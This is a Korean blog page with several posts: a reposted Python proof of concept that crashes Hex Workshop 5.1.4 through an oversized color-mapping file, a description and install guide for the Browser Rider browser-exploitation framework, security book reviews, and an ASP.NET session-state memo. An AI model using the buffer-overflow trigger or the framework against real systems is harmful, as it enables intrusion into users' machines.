다음 코드를 실행한 다음 생성된 파일을 임포트한다.
#exploit.py
# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected
#
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^
chars = "A"*4500
foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"
file=open('enc.cmap','w+')
file.write("\x22"+chars+"\x22"+foot)
file.close()
# by | 2009/01/08 09:31 | Vulnerability | 트랙백
Browser Rider
Browser Rider is a hacking framework to build payloads that exploit the browser. The project aims to provide a powerful, simple and flexible interface to any client side exploit. Browser Rider is not a new concept. Similar tools such as BeEF or Backframe exploited the same concept. However most of the other existing tools out there are unmainted, not updated and not documented. Browser Rider wants to fill those gaps by providing a better alternative.
Download
http://engineeringforfun.com/browserrider.html
Requirement
- PHP 5, with json installed
- Mysql
- Apache with url_rewrite on
- Targets must have Javascript turned on
1. create a mysql table for Browser rider and dump the create.sql file in it
2. edit the .htaccess file for url rewriting to work. To give you an example, on my localhost BR is located at the following url:
http://localhost/projects/BrowserRider/ so my .htaccess file contains
the following line:
RewriteBase /projects/BrowserRider/
3. the final step is to edit the configuration.php file located in the 'lib' folder. You can follow the current documentation to do so: http://www.engineeringforfun.com/wiki/index.php/Browser_Rider_Installation under the section "Editing lib/configuration.php". What needs to be updated are: your mysql login and password, the 'BASE_URL' constant and the $FALSE_URL_REWRITING_VARS variable.
Appendix
json installation
1. download from http://www.aurore.net/projects/php-json/win32/1.1.1/
2. add the follow line to php.ini
extension=php_json.dll
# by | 2008/12/10 13:16 | Tools | 트랙백
솔직히 말하면 꽤 어려웠다. 단어도 어렵고..수학 용어도 많이 나오고..
시간적인 문제도 있고 해서 이해되는 부분만 이해하자는 마음으로 술술~~ 읽었는데...
지금 기억에 남아 있는 건 그래프 정도?
어떻게 하면 보는 사람(고객)이 빨리 이해할 수 있고, 보기에도 좋은 그래프를 만드는 팁이 소개되어 있는 부분이 있다.
시큐리티에 있어서, ALE라든가 ROI 등 측정하기 어려운 부분이 많기 어떻게 하면 잘 보여줄 수 있을까 하는 Visualization이 화제가 되었겠는가.
본인도 그래프를 작성할 일이 꽤 많은 편이고, 가끔 고객으로부터 그래프에 관해서 이런저런 질문을 받곤 하는데.. 그래서 그래프에 관한 것만 머릿속에 남았는지도....
암튼 어쩌다 보니 그래프에 관한 내용으로 일관해 버렸지만, 데이터 수집이라든가 분석(툴) 이 핵심이라고 할 수 있다. 강력 추천!
# by | 2008/12/09 17:56 | Books | 트랙백
가격이 결코 싸지 않음에도 불구하고 대단히 만족감을 안겨준 책이다.
제목 그대로 기술적인 면은 전혀 다루고 있지 않고, 리더쉽, 커뮤니케이션 능력, 비즈니스 통찰력 등 소프트스킬에 관한 내용이 주를 이루고 있다.
CISO는 경영진에 속하는 상위 관리자로서, 최고 경영층에게 어떻게 시큐리티를 세일즈할 것인지가 큰 과제가 되는데, 이에 대한 견해라든가, 프로젝트 진행에 관해서 주의할 점 등. 여러 가지 주제에 관해 여러 사람이 집필한 글을 엄선한 책이다.
# by | 2008/12/09 17:38 | Books | 트랙백
비즈니스맨을 위한 발견력 양성강좌# by | 2008/10/20 23:11 | Books | 트랙백
기한이 정해져 있는 것은 모두 프로젝트이다.# by | 2008/10/20 22:58 | Books | 트랙백
State Server 모드
정의: ASP .NET의 세션 관리만 담당하는 서비스로서 IIS가 관리하던세션 관리를 전용 프로세스에게 위탁하는 서비스이다.
장점
1. 웹 서버의 메모리 부하를 분산
예를 들어, 복수의웹서버와 1대의 세션 관리 서버가 존재하는 경우에 유저가 증가하면세션 관리 서버의 메모리만 증가시키면 된다(각 웹서버의메모리를 증설할 필요가 없다).
2. 어플리케이션을 재기동해도 세션 유지가 가능
웹 어플리케이션 또는 aspnet_wp.exe 가 재기동되는 경우
① global.asax、web.config가 경신된 경우
② web.config의 <processModel> 요소 중에서프로세스 재기동 조건으로서 requestLimit나 memoryLimit 가 설정되어 있고, 그 조건에 부합하는 경우
③ /bin 폴더내의어셈블리를 경신한 경우
④ 어플리케이션 장해로 웹서버를 재기동해야 하는 경우
위와 같은 경우에도 세션 관리 서버는그대로 유지되므로 세션 정보를 손실할 우려가 없다.
3. 여러 대의 웹 서버가 세션 공유 가능
단점
세션 정보를 관리 프로세스가 관리하므로, 세션 정보의 참조나 설정시 관리 프로세스에 액세스해야 한다. 동일 프로세스로의 액세스와 비교하면 오버헤드가 증가하므로, 오버헤드로 인한 손실이 위의 장점보다 큰 경우에는 사용하지 말 것을 권장한다.
기동 순서
1. State 서비스의 기동
관리 도구 -> 서비스 -> ASP.NET State Service 를 시작
2. State 서비스의 활성화
web.config의 sessionState 요소를 이하와 같이 설정한다(가상 디렉터리안에있는 web.config만 설정할 수 있다).
<?xmlversion="1.0" encoding="UTF-8" ?>
<configuration>
<system.web>
<sessionStatemode="StateServer"
stateConnectionString="tcpip=127.0.0.1:42424"
stateNetworkTimeout="10"/>
</system.web>
</configuration>
3. 서비스의 기동 확인
작업 관리자 -> 프로세스 에서 aspnet_state.exe 가 기동되고있는지 확인한다.
다른 방법
SQL Server로 세션 정보를 관리하는 방법
정의: 세션 정보를SQL Server의 테이블에 보존하므로 세션 정보가 늘어나도 메모리부하는 증가하지 않는다.
필요성: State Service로 세션 정보를 관리하는 것도 결국 메모리상에서 관리하는 방법이므로, DataSet오브젝트와 같이 대량의 데이터를 세션 정보로서 관리하는 경우에는 State Service 서버의 메모리 부하도 증가하게 된다.
기동 순서
1. 다음과 같이osql 커맨드를 사용하여 C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322 (Windows XP의 경우) 폴더의 InstallSqlState.sql파일 안에 있는 내용을 복사하여 붙여넣기한다.
> osql -U sa
패스워드 : **
1> USE master
GO
/* Drop the database containing our sprocs */
IF DB_ID('ASPState') IS NOT NULL BEGIN
DROP DATABASE ASPState
END
…이하 생략…
정상적으로 완료되면 ASPState(세션 조작용 StoredProcedure) DB와 tempdb(세션 보관용 테이블) DB가 생성된다.
2. SQL Server 활성화
web.conf의 sessionState 요소를 다음과 같이 설정한다
<?xmlversion="1.0" encoding="UTF-8" ?>
<configuration>
<system.web>
<sessionStatemode="SQLServer"
sqlConnectionString="DataSource=(local);user id=sa;password=sa" />
</system.web>
</configuration>
부하 측면에서는SQLServer > State Service > Inprocess 순이므로, 속도는Inprocess가 가장 빠르다. 따라서 자신의 환경에 가장 적합한 관리 방법을 선택하는것이 중요하다고 할 수 있다.
# by | 2008/10/16 17:14 | Memo | 트랙백
◀ 이전 페이지 다음 페이지 ▶
